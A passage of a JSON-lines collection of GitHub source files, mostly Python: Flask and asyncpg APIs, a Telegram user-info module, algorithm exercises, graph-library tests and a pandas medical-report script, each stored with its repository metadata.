19,\r\n\t\t\"valor\": 0.0\r\n\t},\r\n\t{\r\n\t\t\"dia\": 20,\r\n\t\t\"valor\": 35240.1826\r\n\t},\r\n\t{\r\n\t\t\"dia\": 21,\r\n\t\t\"valor\": 43829.1667\r\n\t},\r\n\t{\r\n\t\t\"dia\": 22,\r\n\t\t\"valor\": 18235.6852\r\n\t},\r\n\t{\r\n\t\t\"dia\": 23,\r\n\t\t\"valor\": 4355.0662\r\n\t},\r\n\t{\r\n\t\t\"dia\": 24,\r\n\t\t\"valor\": 13327.1025\r\n\t},\r\n\t{\r\n\t\t\"dia\": 25,\r\n\t\t\"valor\": 0.0\r\n\t},\r\n\t{\r\n\t\t\"dia\": 26,\r\n\t\t\"valor\": 0.0\r\n\t},\r\n\t{\r\n\t\t\"dia\": 27,\r\n\t\t\"valor\": 25681.8318\r\n\t},\r\n\t{\r\n\t\t\"dia\": 28,\r\n\t\t\"valor\": 1718.1221\r\n\t},\r\n\t{\r\n\t\t\"dia\": 29,\r\n\t\t\"valor\": 13220.495\r\n\t},\r\n\t{\r\n\t\t\"dia\": 30,\r\n\t\t\"valor\": 8414.61\r\n\t}\r\n]\r\n\r\n# Consultar(todos)\r\n@app.route('/vendas', methods=['GET'])\r\ndef obter_livros():\r\n return jsonify(vendas)\r\n\r\n# Consultar(id)\r\n@app.route( '/vendas/' , methods = [ 'GET' ])\r\ndef obter_livros_por_id (dia):\r\n for venda in vendas :\r\n if venda.get( \"dia\" ) == dia :\r\n return jsonify ( venda )\r\n\r\n# Editar livro\r\n@app.route('/vendas/', methods=['PUT'])\r\ndef editar_livro(dia):\r\n venda_alterada = request.get_json()\r\n for indice,venda in enumerate(vendas):\r\n if venda.get('dia') == dia:\r\n vendas[indice].update(venda_alterada)\r\n return jsonify(vendas[indice])\r\n\r\n# Adicionar nova venda\r\n@app.route('/vendas',methods=['POST'])\r\ndef adicionar_nova_venda():\r\n nova_venda = request.get_json()\r\n vendas.append(nova_venda)\r\n return jsonify(vendas)\r\n\r\n#Excluir venda\r\n@app.route('/vendas/',methods=['DELETE'])\r\ndef excluir_venda(dia):\r\n for indice,venda in enumerate(vendas):\r\n if venda.get('dia') == dia:\r\n del vendas[indice]\r\n return jsonify(vendas)\r\n \r\n\r\napp.run(port=5000, host='localhost', debug=True)","repo_name":"Nicolascarm/Biblioteca","sub_path":"Api.py","file_name":"Api.py","file_ext":"py","file_size_in_byte":2839,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"23777453478","text":"# python simple app\n\nimport schedule\nfrom datetime import datetime as dt\nimport time\n\n\ndef job():\n iso_str = dt.now().astimezone().replace(microsecond=0).isoformat()\n print('Hello from py-simple-app [container time is %s]' % iso_str)\n\n\nif __name__ == '__main__':\n # schedule setup\n schedule.every(5).seconds.do(job)\n # first run now\n job()\n # main loop\n while True:\n schedule.run_pending()\n time.sleep(0.5)\n","repo_name":"sourceperl/docker.cookbook","sub_path":"py-simple-app/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":445,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"26970437748","text":"# Major change by @Fl1yd\n#\n# Channel: @ftgmodulesbyfl1yd\n# ============================\n\nimport os\nfrom .. import loader, utils\nfrom telethon.tl.functions.photos import GetUserPhotosRequest\nfrom telethon.tl.functions.users import GetFullUserRequest\nfrom telethon.tl.types import MessageEntityMentionName\n\n\ndef register(cb):\n cb(WhoIsMod())\n\n\nclass WhoIsMod(loader.Module):\n \"\"\"Получает информацию о пользователе в Телеграме (включая вас!).\"\"\"\n strings = {'name': 'WhoIs'}\n\n async def whoiscmd(self, whos):\n \"\"\"Используй .whois <@ или реплай>; ничего\"\"\"\n await whos.edit(\"Получаю информацию о пользователе...\")\n replied_user = await get_user(whos)\n\n try:\n photo, caption = await fetch_info(replied_user, whos)\n except AttributeError:\n whos.edit(\"Не могу найти информацию об этом пользователе.\")\n return\n\n message_id_to_reply = whos.reply_to_msg_id\n if not message_id_to_reply:\n message_id_to_reply = None\n\n try:\n await whos.client.send_file(whos.chat_id, photo, caption=caption,\n link_preview=False, force_document=False,\n reply_to=message_id_to_reply, parse_mode=\"html\")\n if not photo.startswith(\"http\"):\n os.remove(photo)\n await whos.delete()\n except TypeError:\n await whos.edit(caption, parse_mode=\"html\")\n\n\nasync def get_user(event):\n \"\"\"Получение информации о пользователе с реплая или аргумента.\"\"\"\n if event.reply_to_msg_id and not utils.get_args_raw(event):\n previous_message = await event.get_reply_message()\n replied_user = await event.client(GetFullUserRequest(previous_message.from_id))\n else:\n user = utils.get_args_raw(event)\n if user.isnumeric():\n user = int(user)\n if not user:\n self_user = await event.client.get_me()\n user = self_user.id\n if event.entities is not None:\n probable_user_mention_entity = event.entities[0]\n if isinstance(probable_user_mention_entity, MessageEntityMentionName):\n user_id = probable_user_mention_entity.user_id\n replied_user = await event.client(GetFullUserRequest(user_id))\n return replied_user\n try:\n user_object = await event.client.get_entity(user)\n replied_user = await event.client(GetFullUserRequest(user_object.id))\n except:\n self_user = await event.client.get_me()\n user = self_user.id\n user_object = await event.client.get_entity(user)\n replied_user = await event.client(GetFullUserRequest(user_object.id))\n return replied_user\n return replied_user\n\n\nasync def fetch_info(replied_user, event):\n \"\"\"Подробная информация о пользователе.\"\"\"\n replied_user_profile_photos = await event.client(GetUserPhotosRequest(user_id=replied_user.user.id,\n offset=42, max_id=0, limit=80))\n replied_user_profile_photos_count = \"Пользователю нужна помощь с загрузкой аватарки.\"\n try:\n replied_user_profile_photos_count = replied_user_profile_photos.count\n except AttributeError as e:\n pass\n user_id = replied_user.user.id\n first_name = replied_user.user.first_name\n last_name = replied_user.user.last_name\n common_chat = replied_user.common_chats_count\n username = replied_user.user.username\n user_bio = replied_user.about\n is_bot = replied_user.user.bot\n if is_bot == False:\n is_bot = \"Нет\"\n else:\n is_bot = \"Да\"\n restricted = replied_user.user.restricted\n if restricted == False:\n restricted = \"Нет\"\n else:\n restricted = \"Да\"\n verified = replied_user.user.verified\n if verified == False:\n verified = \"Нет\"\n else:\n verified = \"Да\"\n photo = await event.client.download_profile_photo(user_id, str(user_id) + \".jpg\", download_big=True)\n first_name = first_name.replace(\"\\u2060\", \"\") if first_name else \"Пользователь не указал имя.\"\n last_name = last_name.replace(\"\\u2060\", \"\") if last_name else \"Пользователь не указал фамилию.\"\n username = \"@{}\".format(username) if username else \"У пользователя нет юзернейма.\"\n user_bio = \"У пользователя нет информации о себе.\" if not user_bio else user_bio\n\n caption = \"ИНФОРМАЦИЯ О ПОЛЬЗОВАТЕЛЕ:\\n\\n\"\n caption += f\"Имя: {first_name}\\n\"\n caption += f\"Фамилия: {last_name}\\n\"\n caption += f\"Юзернейм: {username}\\n\"\n caption += f\"ID: {user_id}\\n\"\n caption += f\"Бот: {is_bot}\\n\"\n caption += f\"Ограничен: {restricted}\\n\"\n caption += f\"Верифицирован: {verified}\\n\\n\"\n caption += f\"О себе: \\n{user_bio}\\n\\n\"\n caption += f\"Кол-во аватарок в профиле: {replied_user_profile_photos_count}\\n\"\n caption += f\"Общие чаты: {common_chat}\\n\"\n caption += f\"Пермалинк: \"\n caption += f\"клик\"\n\n return photo, caption","repo_name":"Fl1yd/FTG-Modules","sub_path":"whois.py","file_name":"whois.py","file_ext":"py","file_size_in_byte":5680,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"16"} +{"seq_id":"14453641793","text":"from asyncpg import Record\nfrom records.errors import AlbumNotFound, ArtistNotFound\nfrom records import models\nfrom .connection import get_connection\n\n\ndef _db_record_to_album(r: Record) -> models.Album:\n return models.Album(\n id=r[\"album_id\"],\n name=r[\"album_name\"],\n artist=models.Artist(\n id=r[\"artist_id\"],\n name=r[\"artist_name\"],\n ),\n )\n\n\nasync def get_album(album_id: int) -> models.Album:\n async with get_connection() as conn:\n result = await conn.fetchrow(\n \"\"\"\n SELECT\n ar.id AS artist_id,\n ar.name AS artist_name,\n al.id AS album_id,\n al.name AS album_name\n FROM albums AS al\n LEFT JOIN artists AS ar ON al.artist_id = ar.id\n WHERE al.id = $1\n \"\"\",\n album_id,\n )\n if result is None:\n raise AlbumNotFound()\n return _db_record_to_album(result)\n\n\nasync def get_albums() -> list[models.Album]:\n async with get_connection() as conn:\n result = await conn.fetch(\n \"\"\"\n SELECT\n ar.id AS artist_id,\n ar.name AS artist_name,\n al.id AS album_id,\n al.name AS album_name\n FROM albums AS al\n LEFT JOIN artists AS ar ON al.artist_id = ar.id\n \"\"\"\n )\n return [_db_record_to_album(a) for a in result]\n\n\nasync def create_album(album: models.AlbumIn) -> models.Album:\n async with get_connection() as conn:\n artist = await conn.fetchrow(\n \"\"\"\n SELECT id FROM artists WHERE id = $1\n \"\"\",\n album.artist_id,\n )\n if artist is None:\n raise ArtistNotFound()\n result = await conn.fetch(\n \"\"\"\n INSERT INTO albums(\n name,\n artist_id\n ) VALUES($1, $2) RETURNING id\n \"\"\",\n album.name,\n album.artist_id,\n )\n\n out = await conn.fetchrow(\n \"\"\"\n SELECT\n ar.id AS artist_id,\n ar.name AS artist_name,\n al.id AS album_id,\n al.name AS album_name\n FROM albums AS al\n LEFT JOIN artists AS ar ON al.artist_id = ar.id\n WHERE al.id = $1\n \"\"\",\n result[0][\"id\"],\n )\n\n return _db_record_to_album(out)\n","repo_name":"dantheman39/fast-api-quickstart","sub_path":"records/db/albums.py","file_name":"albums.py","file_ext":"py","file_size_in_byte":2441,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"12444416230","text":"import re, pprint\n\n\nclass symbol:\n pixels: list[list[bool]]\n char: int\n real: str\n index: int\n\n def __init__(self,p,c,r,i):\n self.pixels = p\n self.char = c\n self.real = r\n self.index = i\n def __repr__ (self): return self.__str__()\n def __str__(self): return f\"// {self.real:0>4x} {self.char} {self.index}\"\n \n def to_print(self):\n out = \"\\t\"\n a = []\n for row in self.pixels:\n out = f'{out}0x{int(\"\".join(map(str,map(int,row))),2):0>2x}, '\n out = f'{out} {self.__str__()}'\n return out\n\n def rotate_90_ccw(self):\n npx = []\n for i in reversed(range(8)):\n new = []\n for b in range(8):\n new.append(self.pixels[b][i])\n npx.append(new)\n self.pixels = npx\n pass\n\nsyms: dict[int,symbol] = {}\n\nregex = re.compile(\"\\t0x..,.*\")\n\ndef strToBin(s):\n return s == \"1\"\n\nwith open(\"font.h\",'r') as f:\n contents = f.readlines()\n for line in contents:\n if regex.match(line):\n sline = line.strip()\n parts = sline.split(\" \")\n \n px = []\n\n for i in range(8):\n bits = []\n bits[:] = f'{int(parts[i][2:-1],16):0>8b}'\n bits = list(map(strToBin,bits))\n px.append(bits)\n print(line,parts)\n sym = symbol(px,parts[12],int(parts[11],16),int(parts[13]))\n sym.rotate_90_ccw()\n syms[int(parts[11],16)] = sym\n\nprint(f\"const static byte Alphabet[{len(syms)*8}] = {'{'}\")\nfor line in syms.values():\n print(line.to_print())\nprint(\"};\")\nlist(map(symbol.to_print,syms.values()))\n","repo_name":"walksanatora/sketch_jan18a","sub_path":"util/rotate_font.py","file_name":"rotate_font.py","file_ext":"py","file_size_in_byte":1694,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"40183946492","text":"import json\nfrom pathlib import Path\n\nimport click\n\nfrom c7ncli.group import cli_response, ViewCommand, response, \\\n ContextObj, customer_option\nfrom c7ncli.service.constants import PARAM_CUSTOMER, PARAM_NAME, \\\n PARAM_PERMISSIONS\n\n\n@click.group(name='policy')\ndef policy():\n \"\"\"Manages Custodian Service Policy Entities\"\"\"\n\n\n@policy.command(cls=ViewCommand, name='describe')\n@click.option('--policy_name', '-name', type=str,\n help='Policy name to describe.')\n@customer_option\n@cli_response(attributes_order=[PARAM_CUSTOMER, PARAM_NAME, PARAM_PERMISSIONS])\ndef describe(ctx: ContextObj, customer_id, policy_name=None):\n \"\"\"\n Describes Custodian Service policies of a customer\n \"\"\"\n return ctx['api_client'].policy_get(\n customer_display_name=customer_id,\n policy_name=policy_name\n )\n\n\n@policy.command(cls=ViewCommand, name='add')\n@click.option('--policy_name', '-name', type=str, required=True,\n help='Policy name to create')\n@click.option('--permission', '-p', multiple=True,\n help='List of permissions to attach to the policy')\n@click.option('--path_to_permissions', '-path', required=False,\n help='Local path to .json file that contains list of '\n 'permissions to attach to the policy')\n@customer_option\n@cli_response(attributes_order=[PARAM_CUSTOMER, PARAM_NAME, PARAM_PERMISSIONS])\ndef add(ctx: ContextObj, customer_id, policy_name, permission,\n path_to_permissions):\n \"\"\"\n Creates a Custodian Service policy for a customer\n \"\"\"\n if not permission and not path_to_permissions:\n return response('--permission or --path_to_permissions '\n 'must be provided')\n permissions = list(permission)\n if path_to_permissions:\n path = Path(path_to_permissions)\n if not path.exists() or not path.is_file():\n return response(f'File {path_to_permissions} does not exist')\n with open(path, 'r') as file:\n try:\n data = json.load(file)\n except json.JSONDecodeError as e:\n data = []\n permissions.extend(data)\n\n return ctx['api_client'].policy_post(\n name=policy_name,\n permissions=permissions,\n customer=customer_id,\n )\n\n\n@policy.command(cls=ViewCommand, name='update')\n@click.option('--policy_name', '-name', type=str, required=True)\n@click.option('--attach_permission', '-ap', multiple=True,\n required=False,\n help='Names of permissions to attach to the policy')\n@click.option('--detach_permission', '-dp', multiple=True,\n required=False,\n help='Names of permissions to detach from the policy')\n@customer_option\n@cli_response(attributes_order=[PARAM_CUSTOMER, PARAM_NAME, PARAM_PERMISSIONS])\ndef update(ctx: ContextObj, customer_id, policy_name, attach_permission,\n detach_permission):\n \"\"\"\n Updates permission-list within a Custodian Service policy\n \"\"\"\n\n if not attach_permission and not detach_permission:\n return response('At least one of the following arguments must be '\n 'provided: attach_permission, detach_permission')\n\n return ctx['api_client'].policy_patch(\n customer=customer_id,\n name=policy_name,\n permissions_to_attach=attach_permission,\n permissions_to_detach=detach_permission\n )\n\n\n@policy.command(cls=ViewCommand, name='delete')\n@click.option('--policy_name', '-name', type=str, required=True,\n help='Policy name to delete')\n@customer_option\n@cli_response()\ndef delete(ctx: ContextObj, customer_id, policy_name):\n \"\"\"\n Deletes a Custodian Service policy of a customer\n \"\"\"\n if policy_name:\n policy_name = policy_name.lower()\n return ctx['api_client'].policy_delete(\n customer_display_name=customer_id,\n policy_name=policy_name.lower())\n\n\n@policy.command(cls=ViewCommand, name='clean_cache')\n@click.option('--policy_name', '-name', type=str,\n help='Policy name to clean from cache. If not specified, '\n 'all policies cache within the customer is cleaned')\n@customer_option\n@cli_response()\ndef clean_cache(ctx: ContextObj, policy_name, customer_id):\n \"\"\"\n Clears out cached Custodian Service policies within Lambda\n \"\"\"\n return ctx['api_client'].policy_clean_cache(\n customer=customer_id,\n name=policy_name\n )\n","repo_name":"epam/ecc","sub_path":"c7n/c7ncli/group/policy.py","file_name":"policy.py","file_ext":"py","file_size_in_byte":4440,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"43771206755","text":"from uuid import UUID\nfrom uuid import uuid4\nfrom typing import List\nfrom typing import Dict\nfrom typing import Optional\nfrom datetime import datetime\nfrom collections import Counter\nimport dataclasses\nimport winter\n\n\n@dataclasses.dataclass\nclass Comment:\n id: UUID\n topic: str\n author: str\n text: str\n timestamp: datetime\n\n\n@dataclasses.dataclass\nclass TopicStatistics:\n topic: str\n comment_count: int\n\n\ncomments: List[Comment] = [\n Comment(uuid4(), '11e7f524-8729-4286-81c4-991a10f408c1', 'Alexander E', 'Just a test comment', datetime(2022, 8, 31, 10, 11, 00)),\n Comment(uuid4(), '11e7f524-8729-4286-81c4-991a10f408c1', 'Alexander E', 'One more test comment', datetime(2022, 8, 31, 10, 12, 00)),\n Comment(uuid4(), '11e7f524-8729-4286-81c4-991a10f408c1', 'Alexander E', 'The third comment from my side', datetime(2022, 8, 31, 10, 13, 00)),\n Comment(uuid4(), '2b892f00-2b44-4351-9d18-f6b19c1d6d42', 'Alexander E', 'Is it finished?', datetime(2022, 8, 31, 10, 14, 00)),\n Comment(uuid4(), '2b892f00-2b44-4351-9d18-f6b19c1d6d42', 'Ivan Ivanov', 'Nope', datetime(2022, 8, 31, 10, 15, 00)),\n Comment(uuid4(), '333a2af4-4d24-446b-9024-95c477a25e93', 'Alexander E', 'How are you?', datetime(2022, 8, 31, 10, 16, 00)),\n Comment(uuid4(), '333a2af4-4d24-446b-9024-95c477a25e93', 'Ivan Ivanov', 'Fine, how are you?', datetime(2022, 8, 31, 10, 17, 00)),\n Comment(uuid4(), '333a2af4-4d24-446b-9024-95c477a25e93', 'Alexander E', \"Thanks, I'm good\", datetime(2022, 8, 31, 10, 18, 00)),\n]\n\n\n@winter.web.no_authentication\nclass CommentAPI:\n @winter.route_post('comments/')\n @winter.request_body('comment')\n def create_comment(self, comment: Comment):\n comments.append(comment)\n\n @winter.route_delete('comments/{comment_id}/')\n def delete_comment(self, comment_id: UUID):\n global comments\n comments = [comment for comment in comments if comment.id != comment_id]\n\n @winter.route_get('comments/{?topic}')\n def get_comments(self, topic: Optional[str] = None) -> List[Comment]:\n result = comments.copy()\n if topic is not None:\n result = [comment for comment in result if comment.topic == topic]\n return result\n\n @winter.route_get('topic-statistics/{?topics*}')\n def get_topic_statistics(self, topics: List[str]) -> List[TopicStatistics]:\n counter = Counter([comment.topic for comment in comments if comment.topic in topics])\n return [TopicStatistics(topic, count) for topic, count in counter.items()]\n","repo_name":"TodoAppDemoOrg/comment-service","sub_path":"src/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":2520,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"14114785269","text":"import math\n\ndef connected_set(com_set):\n cnt = 0\n for idx in range(1, len(com_set) + 1):\n if com_set[idx] < 0:\n cnt += 1\n return cnt\n\n\ndef checking(com_set, cmp1, cmp2):\n root1 = find_root(com_set, cmp1)\n root2 = find_root(com_set, cmp2)\n\n if root1 == root2 and root1 > 0:\n return True\n return False\n\ndef find_root(com_set, cmp):\n par = cmp\n\n while cmp > 0:\n par = cmp\n cmp = com_set[cmp]\n\n return par\n\ndef connecting(com_set, cmp1, cmp2):\n if not checking(com_set, cmp1, cmp2):\n root1 = find_root(com_set, cmp1)\n root2 = find_root(com_set, cmp2)\n val1 = math.fabs(com_set[root1])\n val2 = math.fabs(com_set[root2])\n if val1 > val2:\n com_set[root2] = root1\n elif val1 < val2:\n com_set[root1] = root2\n else:\n com_set[root2] = root1\n com_set[root1] = -(val1 + 1)\n\n\ndef main():\n amo = int(input())\n\n com_set = {}\n for idx in range(1, amo + 1):\n com_set[idx] = -1\n\n info = input()\n while info != \"S\":\n info_lst = info.split() \n act = info_lst[0]\n cmp1 = int(info_lst[1])\n cmp2 = int(info_lst[2])\n if act == \"I\":\n connecting(com_set, cmp1, cmp2)\n elif act == \"C\":\n if checking(com_set, cmp1, cmp2):\n print(\"yes\")\n else:\n print(\"no\")\n info = input()\n\n total = connected_set(com_set)\n if total == 1:\n print(\"The network is connected.\")\n else:\n print(\"There are \"+ str(total) + \" components.\")\n \n \nmain()","repo_name":"xiaoyueli/MOOC","sub_path":"DatastructureAndAlgorithm/DataStructure-ZhejiangU(20160229-20160603)/week5_FileTransfer.py","file_name":"week5_FileTransfer.py","file_ext":"py","file_size_in_byte":1632,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"8106877211","text":"import math\nimport sys\n# input = sys.stdin.readline\n\ndef f(index): # distance\n return math.sqrt((mxList[index] - kxList[index])**2 + (myList[index] - kyList[index])**2)\n \nax, ay, bx, by, cx, cy, dx, dy = map(int, input().strip().split())\n\n# m : 민호\n# k : 강호\n\nstep1 = (bx-ax) / 1000000\nstart1 = ax\nmxList = []\nfor i in range(1000000):\n mxList.append(start1)\n if start1 == bx:\n break\n start1 += step1\n \nstep2 = (by-ay) / 1000000\nstart2 = ay\nmyList = []\nfor i in range(1000000):\n myList.append(start2)\n if start2 == by:\n break\n start2 += step2\n\nstep3 = (dx-cx) / 1000000\nstart3 = cx\nkxList = []\nfor i in range(1000000):\n kxList.append(start3)\n if start3 == dx:\n break\n start3 += step3\n \nstep4 = (dy-cy) / 1000000\nstart4 = cy\nkyList = []\nfor i in range(1000000):\n kyList.append(start4)\n if start4 == dy:\n break\n start4 += step4 \n \nstart = 0\nend = len(mxList)-1\n\np, q = 0, 0\nwhile end - start >= 3:\n p = (start*2 + end) // 3\n q = (start + end*2) // 3\n if f(p) <= f(q):\n end = q\n else:\n start = p\n\nresult = 1000000\nfor i in range(1000000):\n result = min(result, f(i))\n\nprint(result)\n \n ","repo_name":"micopes/Algorithm","sub_path":"알고리즘 - 파이썬/백준(acmicpc.net)/이진 탐색/삼분 탐색/11662 민호와 강호 - 삼분탐색 그러나, 오차때문에 실패..py","file_name":"11662 민호와 강호 - 삼분탐색 그러나, 오차때문에 실패..py","file_ext":"py","file_size_in_byte":1203,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"16"} +{"seq_id":"71095654087","text":"import pytest\n\nfrom jgrapht import create_graph\n\nimport jgrapht.algorithms.spanning as spanning\nimport jgrapht.generators as generators\n\n\ndef build_graph():\n g = create_graph(\n directed=False,\n allowing_self_loops=False,\n allowing_multiple_edges=False,\n weighted=True,\n )\n\n for i in range(0, 10):\n g.add_vertex(i)\n\n g.add_edge(0, 1)\n g.add_edge(0, 2)\n g.add_edge(0, 3)\n g.add_edge(0, 4)\n g.add_edge(0, 5)\n g.add_edge(0, 6)\n g.add_edge(0, 7)\n g.add_edge(0, 8)\n g.add_edge(0, 9)\n\n g.add_edge(1, 2)\n g.add_edge(2, 3)\n g.add_edge(3, 4)\n g.add_edge(4, 5)\n g.add_edge(5, 6)\n g.add_edge(6, 7)\n g.add_edge(7, 8)\n g.add_edge(8, 9)\n g.add_edge(9, 1)\n\n return g\n\n\ndef test_kruskal():\n g = build_graph()\n mst_w, mst_edges = spanning.kruskal(g)\n assert mst_w == 9.0\n expected = set([0, 1, 2, 3, 4, 5, 6, 7, 8])\n solution = set(mst_edges)\n assert expected == solution\n\n\ndef test_prim():\n g = build_graph()\n mst_w, mst_edges = spanning.prim(g)\n assert mst_w == 9.0\n expected = set([0, 1, 2, 3, 4, 5, 6, 7, 8])\n solution = set(mst_edges)\n assert expected == solution\n\n\ndef test_boruvka():\n g = build_graph()\n mst_w, mst_edges = spanning.boruvka(g)\n assert mst_w == 9.0\n expected = set([0, 1, 2, 3, 4, 5, 6, 7, 8])\n solution = set(mst_edges)\n assert expected == solution\n\n\ndef test_small_graph_prim():\n g = create_graph(directed=False)\n\n generators.gnp_random_graph(g, n=500, p=0.1, seed=17)\n\n mst_w, mst_edges = spanning.prim(g)\n assert mst_w == 499.0\n\n\ndef test_anyhashableg_prim():\n g = create_graph(\n directed=False,\n allowing_self_loops=False,\n allowing_multiple_edges=False,\n weighted=True,\n any_hashable=True,\n )\n\n g.add_vertex(\"0\")\n g.add_vertex(\"1\")\n g.add_vertex(\"2\")\n\n e1 = g.add_edge(\"0\", \"1\")\n g.set_edge_weight(e1, 1.0)\n e2 = g.add_edge(\"1\", \"2\")\n g.set_edge_weight(e2, 2.0)\n e3 = g.add_edge(\"2\", \"0\")\n g.set_edge_weight(e3, 3.0)\n\n mst_w, mst_edges = spanning.prim(g)\n assert mst_w == 3.0\n assert set(mst_edges) == {e1, e2}\n \ndef test_result_with_difference(): \n g = build_graph()\n mst_weight, mst_tree = spanning.prim(g)\n\n non_mst_edges = g.edges - set(mst_tree)\n\n # test that our intermediate set results, property implement\n # method _from_iterable\n\n assert non_mst_edges == { 9, 10, 11, 12, 13, 14, 15, 16, 17 }\n\ndef test_result_with_difference_symmetric(): \n g = build_graph()\n mst_weight, mst_tree = spanning.prim(g)\n\n non_mst_edges = g.edges - set(mst_tree)\n\n # test that our intermediate set results, property implement\n # method _from_iterable\n\n assert non_mst_edges == { 9, 10, 11, 12, 13, 14, 15, 16, 17 }\n","repo_name":"d-michail/python-jgrapht","sub_path":"tests/test_mst.py","file_name":"test_mst.py","file_ext":"py","file_size_in_byte":2797,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"16"} +{"seq_id":"41187970065","text":"n = list()\nresult = False\nfor i in range(int(input(\"Введите количество чисел: \"))):\n n.append(int(input()))\na = int(input())\nfor i in range(len(n)):\n for j in range(len(n) - i):\n if (n[i] * n[j]) == a:\n result = True\nif result:\n print(\"Да\")\nelse:\n print(\"Нет\")\n","repo_name":"Isinbaeva/M-21","sub_path":"10/1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":318,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"6550540145","text":"import os\nimport subprocess\n\n\ndef format_file(file_path):\n subprocess.run([\"black\", file_path], check=True)\n\n\ndef main():\n for root, dirs, files in os.walk(\".\"):\n if \"venv\" in dirs:\n dirs.remove(\"venv\") # don't visit this directory\n\n for name in files:\n if name.endswith(\".py\"):\n format_file(os.path.join(root, name))\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"abryant710/auto-codebase-documenter","sub_path":"format_code.py","file_name":"format_code.py","file_ext":"py","file_size_in_byte":416,"program_lang":"python","lang":"en","doc_type":"code","stars":89,"dataset":"github-code","pt":"16"} +{"seq_id":"32441306043","text":"import pandas as pd\nfrom datetime import datetime\n\ndef data_processing(rhino_report, red_rc, dsp_patients, start_date, end_date, output_location):\n try:\n pd.set_option('display.float_format', lambda x: '%.0f' % x)\n fields_for_rhino = ['clinician_first_name', 'clinician_last_name', 'encounter_date', 'encounter_time', 'encounter_id', 'first_name', 'last_name', 'date_of_birth', 'age_at_presentation', 'gender', 'medicare_number', 'indigenous_status', 'address_line1', 'suburb', 'state', 'postcode', 'emergency_contact_name', 'country_of_birth','home_language', 'patient_symptoms', 'usual_medications', 'specimen_collected', 'diagnosis', 'outcome']\n rhino_report = pd.read_excel(rhino_report, dtype={'medicare_number': 'str'},usecols= fields_for_rhino)\n red_rc = pd.read_csv(red_rc, header=0, encoding='CP1252')\n dsp_patients = pd.read_csv(dsp_patients, header=0, encoding='CP1252')\n red_rc = red_rc.drop(columns=['Patient','Patient Type','Payer','Account Payer Type', 'Date','Brn','Doc','Stf','Inv #','Item','Transaction Type','Transaction Status','GST','Amount','Fee Type','Analysis Group'])\n red_rc = red_rc.rename(columns={'File #': 'FILE_NUMBER'})\n dsp_patients = dsp_patients.drop(columns=['patient_name','full_name', 'full_suburb', 'address', 'full_mailing_suburb', 'TITLE', 'HOME_ADDRESS_LINE_2', 'USUAL_CLINIC', 'USUAL_DOCTOR', 'TYPE_CODE',\t'STATUS_CODE', 'PRACTICE_DEFINABLE_FIELD1_CODE', 'PRACTICE_DEFINABLE_FIELD2_CODE','PRACTICE_DEFINABLE_FIELD3_CODE',\t'PRACTICE_DEFINABLE_FIELD4_CODE','PRACTICE_DEFINABLE_FIELD5_CODE','PRACTICE_DEFINABLE_FIELD6','PRACTICE_DEFINABLE_FIELD7',\t'PRACTICE_DEFINABLE_FIELD8', 'PRACTICE_DEFINABLE_FIELD9', 'PRACTICE_DEFINABLE_FIELD10', 'FIRST_IN', 'LAST_IN', 'ALERTS', 'CLINIC_CODE', 'PATIENT_ID', 'MAILING_ADDRESS_LINE_1', 'MAILING_ADDRESS_LINE_2', 'MAILING_SUBURB_TOWN', 'MAILING_POSTCODE','FAMILY_ID' , 'email_ADDRESS', 'VETERAN_AFFAIRS_NUMBER','VETERAN_FILE_NUMBER_EXPIRY_DATE',\t'PATIENT_HEALTH_CARE_CARD', 'PATIENT_HLTH_CARE_CARD_EX_DATE', 'SAFETY_NET_NO', 'HOME_PHONE', 'GENDER', 'MEDICARE_BASE_NUMBER'])\n dsp_patients.FILE_NUMBER = dsp_patients.FILE_NUMBER.fillna(-1)\n dsp_patients.FILE_NUMBER = dsp_patients.FILE_NUMBER.astype(int)\n \n merged_data = pd.merge(red_rc, dsp_patients, on='FILE_NUMBER', how ='inner')\n #drop any duplicates made in the merge based off FILE_NUMBER and ENCOUNTER_DATE\n merged_data = merged_data.drop_duplicates(subset=['FILE_NUMBER', 'ServDate'])\n #format the data in the dataframe so the program can use it properly.\n # I want to have empty fields in a standard format that I can send to the browser. \n merged_data = merged_data.fillna('')\n # I want to have the medicare number/ postocode as a string so I can slice easily and send to the browser. \n merged_data.MEDICARE_NUMBER = merged_data.MEDICARE_NUMBER.astype(str)\n \n #print(merged_data_pcr)\n # remove whitepace in strings so I can index properly. \n rhino_report['first_name'] = rhino_report['first_name'].str.strip()\n rhino_report['first_name'] = rhino_report['first_name'].str.capitalize()\n merged_data['GIVEN_NAME'] = merged_data['GIVEN_NAME'].str.strip()\n merged_data['GIVEN_NAME'] = merged_data['GIVEN_NAME'].str.capitalize()\n rhino_report['medicare_number'] = rhino_report['medicare_number'].str.replace(' ', '')\n merged_data['MEDICARE_NUMBER'] = merged_data['MEDICARE_NUMBER'].str.slice(start = 0, stop = 10)\n #merged_data['MEDICARE_NUMBER'] = merged_data['MEDICARE_NUMBER'].str.replace(' ', '')\n #merged_data['DATE_OF_BIRTH'] = merged_data['DATE_OF_BIRTH'].str.replace(' ', '')\n #rhino_report['date_of_birth'] = rhino_report['date_of_birth'].str.replace(' ', '')\n rhino_report['encounter_date'] = pd.to_datetime(rhino_report['encounter_date'],errors='coerce', format='%d/%m/%Y')\n merged_data['ServDate'] = pd.to_datetime(merged_data['ServDate'],errors='coerce', format='%d/%m/%Y')\n merged_data['DATE_OF_BIRTH'] = 